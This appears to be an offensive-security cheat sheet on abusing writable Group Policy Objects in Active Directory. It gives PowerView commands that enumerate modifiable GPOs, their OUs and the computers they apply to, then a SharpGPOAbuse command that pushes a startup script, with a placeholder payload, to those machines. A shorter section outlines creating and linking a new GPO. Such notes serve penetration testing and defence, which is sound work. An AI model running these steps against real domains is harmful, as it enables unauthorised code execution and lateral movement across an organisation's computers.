GPOs

Introduction

A GPO (Group Policy Object) is a collection of settings that define how computers and users on a network should behave. GPOs are used to enforce security policies, configure system settings, and manage software installations across multiple computers in an organization.

If domain users can modify a GPO, it can lead to several problems like having RCE on a machine.

Modifiable GPOs

1. Enumerate modifiable GPOs

Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }

2. If there is any, resolve its GPO name and the SID of the principal.

Get-DomainGPO -Identity "<ObjectDN>" | select displayName, gpcFileSysPath
ConvertFrom-SID <SecurityIdentifier>

3. Find out the OU where the GPO appears.

Get-DomainOU -GPLink "{RelativeDN}" | select distinguishedName

4. Get the computer where the GPO applies.

Get-DomainComputer -SearchBase "<OU_distinguishedname>" | select dnsHostName

5. Modify the GPO

.\SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "<SCRIPT_CONTENT>" --GPOName "<GPO_NAME>"

6. Wait for the GPO to take effect (20 minutes or so).

Principals with Create groupPolicyContainer objects privilege

1. Enumerate principals (Users/groups) that can create new GPOs in the domain.

2. Look for OUs with "WriteProperty" on the attribute "GP-LINK".

3. Become the principal and create a GPO

ℹ️Because we are using the autorun key registry, the workstation must be restarted so the payload is executed.